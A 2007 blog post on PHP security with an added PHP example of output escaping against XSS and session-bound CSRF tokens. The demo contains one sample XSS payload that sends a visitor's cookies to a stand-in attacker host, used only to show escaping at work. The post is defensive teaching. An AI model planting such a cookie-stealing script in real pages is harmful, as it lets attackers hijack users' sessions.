Sunday, March 25, 2007

Good Article on Web Application Security Vulnerabilities

The PHP programming language has historically gotten a bad rap in the area of security. While the language itself has had some vulnerabilities, three other aspects have (in my opinion) played a larger role:

  • PHP is an easy language to learn, so a lot of beginners with no awareness of common vulnerability classes write web applications in it.

  • The rise of PHP coincided with a rise in community content applications (bulletin boards, blogs, Nukes) where external, untrusted users could insert their own content with potentially malicious payloads.

  • The PHP programming community was a little late in adopting web application frameworks. A good framework provides the plumbing for a web application and centralizes defenses against known vulnerability classes (input validation, output escaping, CSRF tokens), so the custom code that developers write doesn't have to reimplement them, provided developers actually use those components instead of bypassing them.

The first and third of these factors are rapidly changing. The PHP development community is getting more sophisticated from a technology perspective, and frameworks are getting better and are becoming more commonly used.

I am seeing more and more articles concerning security on PHP developer websites and in magazines. For example, there is a really good article on the eZ publish site about Cross Site Request Forgery (CSRF) and Cross Site Scripting (XSS). It goes over how an attacker can inject malicious code into your site and how to protect yourself against these attacks. Here is a hint: never trust anything that a user enters, and encode it for the context it is output in (HTML, attribute, JavaScript, SQL) rather than relying on a single filter at the input side. For more reading, check out Rob Miller's PHP Security Guide.

If you have been holding back on using a framework, I would reconsider. Most of the PHP frameworks have filter components (the Zend Framework has Zend_Filter; eZ components has a User Input component) that disarm potentially hazardous user input. Keep in mind that input filtering alone does not stop CSRF, which needs a per-session token checked on every state-changing request, nor does it replace output escaping for XSS. Tapping into the collective intelligence about security frees you to build better, more effective web applications.
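To make the XSS and CSRF points above concrete, here is an added example in plain PHP (PHP 7 or later, no framework). It is not code from the eZ publish article, Rob Miller's guide, or this post; the function names (`e`, `render_greeting_*`, `csrf_*`) and the sample payload are my own, and the `$session` array stands in for `$_SESSION` so the script runs from the command line. It shows the vulnerable echo beside the escaped one, and a session-bound CSRF token that is generated, embedded in a form, and verified with a constant-time compare.

```php
<?php
// Added example (not from the eZ publish article or this post): minimal XSS and
// CSRF defenses in plain PHP 7+, without a framework. Names are assumptions.

declare(strict_types=1);

// --- XSS: the vulnerable pattern ---------------------------------------------
// Echoing raw user input into HTML lets "<script>" (or an attribute break-out)
// run in every visitor's browser. This is the pattern the article warns about.
function render_greeting_vulnerable(string $name): string
{
    return "<p>Hello, " . $name . "</p>";
}

// --- XSS: the fix, encode on output for the HTML context ---------------------
// htmlspecialchars with ENT_QUOTES escapes < > & " and ' so the browser treats
// the input as text, never as markup. Passing the charset explicitly avoids
// depending on the default_charset ini setting.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_greeting_safe(string $name): string
{
    return "<p>Hello, " . e($name) . "</p>";
}

// --- CSRF: per-session token --------------------------------------------------
// $session stands in for $_SESSION so the script runs from the CLI; in a real
// request handler you would pass $_SESSION itself (after session_start()).
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        // 32 random bytes from the CSPRNG, hex-encoded for safe transport.
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Emit the token as a hidden field. Even server-generated data is escaped
// before it lands in an attribute; the habit is what prevents mistakes.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="' . e(csrf_token($session)) . '">';
}

// Verify a submitted token. hash_equals avoids leaking the token through the
// timing of an early-exit string compare. A missing session token (expired or
// never issued) fails closed rather than open.
function csrf_verify(array $session, array $post): bool
{
    if (empty($session['csrf_token'])
        || !isset($post['csrf_token'])
        || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// --- Demo on constructed input (not real traffic) -----------------------------
$payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

echo "Vulnerable: " . render_greeting_vulnerable($payload) . "\n";
echo "Safe:       " . render_greeting_safe($payload) . "\n\n";

$session = [];                                   // constructed stand-in for $_SESSION
echo "Form field: " . csrf_field($session) . "\n";

// A legitimate submission carries the token the server put in the form.
$goodPost   = ['csrf_token' => $session['csrf_token'], 'comment' => 'hi'];
// A form on an attacker's site cannot read our session token, so it is absent
// or guessed; both must be rejected.
$forgedPost = ['comment' => 'hi'];
$guessPost  = ['csrf_token' => str_repeat('0', 64), 'comment' => 'hi'];

var_dump(csrf_verify($session, $goodPost));
var_dump(csrf_verify($session, $forgedPost));
var_dump(csrf_verify($session, $guessPost));
```

Run it with `php example.php`. The vulnerable line prints the script tag intact, the safe line prints it as `&lt;script&gt;...`, and only the submission carrying the session's own token verifies. In a real application the token check belongs on every POST (or other state-changing) handler, and the session cookie should be marked HttpOnly so a successful XSS cannot simply read it.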